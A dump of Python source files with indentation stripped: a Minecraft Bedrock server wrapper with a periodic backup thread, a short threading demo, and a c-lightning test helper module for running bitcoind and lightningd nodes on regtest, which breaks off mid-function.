process = subprocess.Popen('bedrock_server.exe', stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Allows for input from the console
def input_loop():
while True:
inp = input() + "\n"
process.stdin.write(inp.encode())
process.stdin.flush()
# Output from bedrock_server.exe
def output_loop():
while True:
for line in process.stdout:
clean_line = line.decode("utf-8").rstrip("\n")
print(clean_line)
with open("log.txt", "a+") as log_file:
log_file.write(clean_line)
# Backing up loop
def backup_loop():
while True:
to_type = "save hold\n"
process.stdin.write(to_type.encode())
process.stdin.flush()
sleep(10)
system("backup.bat")
sleep(.75)
to_type = "save resume\n"
process.stdin.write(to_type.encode())
process.stdin.flush()
sleep(21600) # That's 6 hours
# Start the threads
_output = threading.Thread(target=input_loop)
_input = threading.Thread(target=output_loop)
_backup = threading.Thread(target=backup_loop)
_output.start()
_input.start()
sleep(15)
_backup.start()
|
threadDemo.py
|
#! python3
# threadDemo.py
import time
import threading
print('Start of program.')
def takeANap():
time.sleep(5)
print('Wake up!')
threadObj = threading.Thread(target=takeANap)
threadObj.start()
print('End of program.')
|
utils.py
|
from bitcoin.core import COIN # type: ignore
from bitcoin.rpc import RawProxy as BitcoinProxy # type: ignore
from bitcoin.rpc import JSONRPCError
from contextlib import contextmanager
from pathlib import Path
from pyln.client import RpcError
from pyln.testing.btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve # type: ignore
from pyln.client import LightningRpc
from pyln.client import Millisatoshi
import json
import logging
import lzma
import math
import os
import psutil # type: ignore
import random
import re
import shutil
import sqlite3
import string
import struct
import subprocess
import sys
import threading
import time
import warnings
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
"fallbackfee": Decimal(1000) / COIN,
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
FUNDAMOUNT = 10**6
def env(name, default=None):
"""Access to environment variables
Allows access to environment variables, falling back to config.vars (part
of c-lightning's `./configure` output), and finally falling back to a
default value.
"""
fname = 'config.vars'
if os.path.exists(fname):
lines = open(fname, 'r').readlines()
config = dict([(line.rstrip().split('=', 1)) for line in lines])
else:
config = {}
if name in os.environ:
return os.environ[name]
elif name in config:
return config[name]
else:
return default
VALGRIND = env("VALGRIND") == "1"
TEST_NETWORK = env("TEST_NETWORK", 'regtest')
DEVELOPER = env("DEVELOPER", "0") == "1"
TEST_DEBUG = env("TEST_DEBUG", "0") == "1"
SLOW_MACHINE = env("SLOW_MACHINE", "0") == "1"
DEPRECATED_APIS = env("DEPRECATED_APIS", "0") == "1"
TIMEOUT = int(env("TIMEOUT", 180 if SLOW_MACHINE else 60))
EXPERIMENTAL_DUAL_FUND = env("EXPERIMENTAL_DUAL_FUND", "0") == "1"
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success():
time_left = start_time + timeout - time.time()
if time_left <= 0:
raise ValueError("Timeout while waiting for {}", success)
time.sleep(min(interval, time_left))
interval *= 2
if interval > 5:
interval = 5
def write_config(filename, opts, regtest_opts=None, section_name='regtest'):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[{}]\n".format(section_name))
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
self.err_logs = []
self.prefix = ""
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self, stdin=None, stdout=None, stderr=None):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line,
stdin=stdin,
stdout=stdout if stdout else subprocess.PIPE,
stderr=stderr,
env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
line = line.decode('UTF-8', 'replace').rstrip()
if self.log_filter(line):
continue
if self.verbose:
sys.stdout.write("{}: {}\n".format(self.prefix, line))
with self.logs_cond:
self.logs.append(line)
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
if self.proc.stderr:
for line in iter(self.proc.stderr.readline, ''):
if line is None or len(line) == 0:
break
line = line.rstrip().decode('UTF-8', 'replace')
self.err_logs.append(line)
self.proc.stderr.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def is_in_stderr(self, regex):
"""Look for `regex` in stderr."""
ex = re.compile(regex)
for l in self.err_logs:
if ex.search(l):
logging.debug("Found '%s' in stderr", regex)
return l
logging.debug("Did not find '%s' in stderr", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
with self.logs_cond:
if pos >= len(self.logs):
if not self.running:
raise ValueError('Process died while waiting for logs')
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
logging.debug("Calling {name} with arguments {args}".format(
name=name,
args=args
))
res = proxy._call(name, *args)
logging.debug("Result for {name} call: {res}".format(
name=name,
res=res,
))
return res
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-txindex',
'-nowallet',
'-addresstype=bech32'
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
self.conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(self.conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
try:
self.rpc.createwallet("lightningd-tests")
except JSONRPCError:
self.rpc.loadwallet("lightningd-tests")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
proxy.start()
return proxy
# wait_for_mempool can be used to wait for the mempool before generating blocks:
# True := wait for at least 1 transation
# int > 0 := wait for at least N transactions
# 'tx_id' := wait for one transaction id given as a string
# ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
mempool = self.rpc.getrawmempool()
logging.debug("Generating {numblocks}, confirming {lenmempool} transactions: {mempool}".format(
numblocks=numblocks,
mempool=mempool,
lenmempool=len(mempool),
))
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height=[height] and re-mine all mempool
transactions into [height + shift], where shift >= 0. Returns hashes of generated
blocks.
Note that tx's that become invalid at [height] (because coin maturity, locktime
etc.) are removed from mempool. The length of the new chain will be original + 1
OR original + [shift], whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1, use [height]=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can be pulled
forward to h1.
2. Set [height]=h2 and [shift]= h1-h2
"""
hashes = []
fee_delta = 1000000
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
final_len = height + shift if height + shift > orig_len else 1 + orig_len
# TODO: raise error for insane args?
self.rpc.invalidateblock(old_hash)
self.wait_for_log(r'InvalidChainFound: invalid block=.* height={}'.format(height))
memp = self.rpc.getrawmempool()
if shift == 0:
hashes += self.generate_block(1 + final_len - height)
else:
for txid in memp:
# lower priority (to effective feerate=0) so they are not mined
self.rpc.prioritisetransaction(txid, None, -fee_delta)
hashes += self.generate_block(shift)
for txid in memp:
# restore priority so they are mined
self.rpc.prioritisetransaction(txid, None, fee_delta)
hashes += self.generate_block(1 + final_len - (height + shift))
self.wait_for_log(r'UpdateTip: new best=.* height={}'.format(final_len))
return hashes
def getnewaddress(self):
return self.rpc.getnewaddress()
class ElementsD(BitcoinD):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
config = BITCOIND_CONFIG.copy()
if 'regtest' in config:
del config['regtest']
config['chain'] = 'liquid-regtest'
BitcoinD.__init__(self, bitcoin_dir, rpcport)
self.cmd_line = [
'elementsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-nowallet',
'-validatepegin=0',
'-con_blocksubsidy=5000000000',
]
conf_file = os.path.join(bitcoin_dir, 'elements.conf')
config['rpcport'] = self.rpcport
BITCOIND_REGTEST = {'rpcport': self.rpcport}
write_config(conf_file, config, BITCOIND_REGTEST, section_name='liquid-regtest')
self.conf_file = conf_file
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.prefix = 'elementsd'
def getnewaddress(self):
"""Need to get an address and then make it unconfidential
"""
addr = self.rpc.getnewaddress()
info = self.rpc.getaddressinfo(addr)
return info['unconfidential']
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': '{}'.format("true" if DEPRECATED_APIS
else "false"),
'network': TEST_NETWORK,
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
# Make sure we don't touch any existing config files in the user's $HOME
'bitcoin-datadir': lightning_dir,
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(os.path.join(lightning_dir, TEST_NETWORK)):
os.makedirs(os.path.join(lightning_dir, TEST_NETWORK))
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, TEST_NETWORK, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-fast-gossip'] = None
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self, stdin=None, stdout=None, stderr=None,
wait_for_initialized=True):
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self, stdin, stdout, stderr)
if wait_for_initialized:
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class PrettyPrintingLightningRpc(LightningRpc):
"""A version of the LightningRpc that pretty-prints calls and results.
Useful when debugging based on logs, and less painful to the
eyes. It has some overhead since we re-serialize the request and
result to json in order to pretty print it.
Also validates (optional) schemas for us.
"""
def __init__(self, socket_path, executor=None, logger=logging,
patch_json=True, jsonschemas={}):
super().__init__(
socket_path,
executor,
logger,
patch_json,
)
self.jsonschemas = jsonschemas
def call(self, method, payload=None):
id = self.next_id
self.logger.debug(json.dumps({
"id": id,
"method": method,
"params": payload
}, indent=2))
res = LightningRpc.call(self, method, payload)
self.logger.debug(json.dumps({
"id": id,
"result": res
}, indent=2))
if method in self.jsonschemas:
self.jsonschemas[method].validate(res)
return res
class LightningNode(object):
def __init__(self, node_id, lightning_dir, bitcoind, executor, valgrind, may_fail=False,
may_reconnect=False,
allow_broken_log=False,
allow_warning=False,
allow_bad_gossip=False,
db=None, port=None, disconnect=None, random_hsm=None, options=None,
jsonschemas={},
**kwargs):
self.bitcoin = bitcoind
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
self.allow_broken_log = allow_broken_log
self.allow_bad_gossip = allow_bad_gossip
self.allow_warning = allow_warning
self.db = db
# Assume successful exit
self.rc = 0
socket_path = os.path.join(lightning_dir, TEST_NETWORK, "lightning-rpc").format(node_id)
self.rpc = PrettyPrintingLightningRpc(socket_path, self.executor, jsonschemas=jsonschemas)
self.daemon = LightningD(
lightning_dir, bitcoindproxy=bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
self.daemon.disconnect_file = os.path.join(lightning_dir, TEST_NETWORK, "dev_disconnect")
with open(self.daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
self.daemon.opts["dev-disconnect"] = "dev_disconnect"
if DEVELOPER:
self.daemon.opts["dev-fail-on-subdaemon-fail"] = None
# Don't run --version on every subdaemon if we're valgrinding and slow.
if SLOW_MACHINE and VALGRIND:
self.daemon.opts["dev-no-version-checks"] = None
if os.getenv("DEBUG_SUBD"):
self.daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if valgrind:
self.daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
else:
# Under valgrind, scanning can access uninitialized mem.
self.daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if not may_reconnect:
self.daemon.opts["dev-no-reconnect"] = None
if EXPERIMENTAL_DUAL_FUND:
self.daemon.opts["experimental-dual-fund"] = None
if options is not None:
self.daemon.opts.update(options)
dsn = db.get_dsn()
if dsn is not None:
self.daemon.opts['wallet'] = dsn
if valgrind:
self.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*,*elements-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(self.daemon.lightning_dir)
]
# Reduce precision of errors, speeding startup and reducing memory greatly:
if SLOW_MACHINE:
self.daemon.cmd_prefix += ['--read-inline-info=no']
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity=FUNDAMOUNT, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit", mine_block=True):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
if mine_block:
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {} CONFIRMED'.format(txid))
return addr, txid
def fundbalancedchannel(self, remote_node, total_capacity, announce=True):
'''
Creates a perfectly-balanced channel, as all things should be.
'''
if isinstance(total_capacity, Millisatoshi):
total_capacity = int(total_capacity.to_satoshi())
else:
total_capacity = int(total_capacity)
self.fundwallet(total_capacity + 10000)
if remote_node.config('experimental-dual-fund'):
remote_node.fundwallet(total_capacity + 10000)
# We cut the total_capacity in half, since the peer's
# expected to contribute that same amount
chan_capacity = total_capacity // 2
total_capacity = chan_capacity * 2
# Tell the node to equally dual-fund the channel
remote_node.rpc.call('funderupdate', {'policy': 'match',
'policy_mod': 100,
'fuzz_percent': 0})
else:
chan_capacity = total_capacity
self.rpc.connect(remote_node.info['id'], 'localhost', remote_node.port)
# Make sure the fundchannel is confirmed.
num_tx = len(self.bitcoin.rpc.getrawmempool())
res = self.rpc.fundchannel(remote_node.info['id'], chan_capacity, feerate='slow', minconf=0, announce=announce, push_msat=Millisatoshi(chan_capacity * 500))
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
blockid = self.bitcoin.generate_block(1)[0]
# Generate the scid.
outnum = get_tx_p2wsh_outnum(self.bitcoin, res['tx'], total_capacity)
if outnum is None:
raise ValueError("no outnum found. capacity {} tx {}".format(total_capacity, res['tx']))
for i, txid in enumerate(self.bitcoin.rpc.getblock(blockid)['tx']):
if txid == res['txid']:
txnum = i
return '{}x{}x{}'.format(self.bitcoin.rpc.getblockcount(), txnum, outnum)
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query):
return self.db.query(query)
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, TEST_NETWORK, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def is_synced_with_bitcoin(self, info=None):
if info is None:
info = self.rpc.getinfo()
return 'warning_bitcoind_sync' not in info and 'warning_lightningd_sync' not in info
def start(self, wait_for_bitcoind_sync=True, stderr=None):
self.daemon.start(stderr=stderr)
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
if wait_for_bitcoind_sync and not self.is_synced_with_bitcoin(self.info):
wait_for(lambda: self.is_synced_with_bitcoin())
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
self.rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if self.rc is None:
self.rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if self.rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(self.rc))
else:
return self.rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True, announce_channel=True):
warnings.warn("LightningNode.fund_channel is deprecated in favor of "
"LightningNode.fundchannel", category=DeprecationWarning)
return self.fundchannel(l2, amount, wait_for_active, announce_channel)
def fundchannel(self, l2, amount=FUNDAMOUNT, wait_for_active=True,
announce_channel=True, **kwargs):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
def has_funds_on_addr(addr):
"""Check if the given address has funds in the internal wallet.
"""
outs = self.rpc.listfunds()['outputs']
addrs = [o['address'] for o in outs]
return addr in addrs
# We should not have funds on that address yet, we just generated it.
assert(not has_funds_on_addr(addr))
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
self.bitcoin.generate_block(1)
# Now we should.
wait_for(lambda: has_funds_on_addr(addr))
# Now go ahead and open a channel
res = self.rpc.fundchannel(l2.info['id'], amount,
announce=announce_channel,
**kwargs)
wait_for(lambda: res['txid'] in self.bitcoin.rpc.getrawmempool())
blockid = self.bitcoin.generate_block(1)[0]
for i, txid in enumerate(self.bitcoin.rpc.getblock(blockid)['tx']):
if txid == res['txid']:
txnum = i
scid = "{}x{}x{}".format(self.bitcoin.rpc.getblockcount(),
txnum, res['outnum'])
if wait_for_active:
self.wait_channel_active(scid)
l2.wait_channel_active(scid)
return scid, res
def subd_pid(self, subd, peerid=None):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
if peerid:
ex = re.compile(r'{}-.*{}.*: pid ([0-9]*),'
.format(peerid, subd))
else:
ex = re.compile('{}-.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def get_channel_id(self, other):
"""Get the channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels(chanid)['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=TIMEOUT):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
# This helper waits for all HTLCs to settle
# `scids` can be a list of strings. If unset wait on all channels.
def wait_for_htlcs(self, scids=None):
peers = self.rpc.listpeers()['peers']
for p, peer in enumerate(peers):
if 'channels' in peer:
for c, channel in enumerate(peer['channels']):
if scids is not None and channel['short_channel_id'] not in scids:
continue
if 'htlcs' in channel:
wait_for(lambda: len(self.rpc.listpeers()['peers'][p]['channels'][c]['htlcs']) == 0)
# This sends money to a directly connected peer
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
# check we are connected
dst_id = dst.info['id']
assert len(self.rpc.listpeers(dst_id).get('peers')) == 1
# make an invoice
inv = dst.rpc.invoice(amt, label, label)
# FIXME: pre 0.10.1 invoice calls didn't have payment_secret field
psecret = dst.rpc.decodepay(inv['bolt11'])['payment_secret']
rhash = inv['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst_id,
'delay': 5,
'channel': '1x1x1' # note: can be bogus for 1-hop direct payments
}
# sendpay is async now
self.rpc.sendpay([routestep], rhash, payment_secret=psecret)
# wait for sendpay to comply
result = self.rpc.waitsendpay(rhash)
assert(result.get('status') == 'complete')
# This helper sends all money to a peer until even 1 msat can't get through.
def drain(self, peer):
total = 0
msat = 4294967295 # Max payment size in some configs
while msat != 0:
try:
logging.debug("Drain step with size={}".format(msat))
self.pay(peer, msat)
total += msat
except RpcError as e:
logging.debug("Got an exception while draining channel: {}".format(e))
msat //= 2
logging.debug("Draining complete after sending a total of {}msats".format(total))
return total
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [6, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [12, 'ECONOMICAL']:
feerate = feerates[2] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[3] * 4
else:
warnings.warn("Don't have a feerate set for {}/{}.".format(
params[0], params[1],
))
feerate = 42
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda:
self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 4)
# force new feerates by restarting and thus skipping slow smoothed process
# Note: testnode must be created with: opts={'may_reconnect': True}
def force_feerates(self, rate):
assert(self.may_reconnect)
self.set_feerates([rate] * 4, False)
self.restart()
self.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
assert(self.rpc.feerates('perkw')['perkw']['opening'] == rate)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
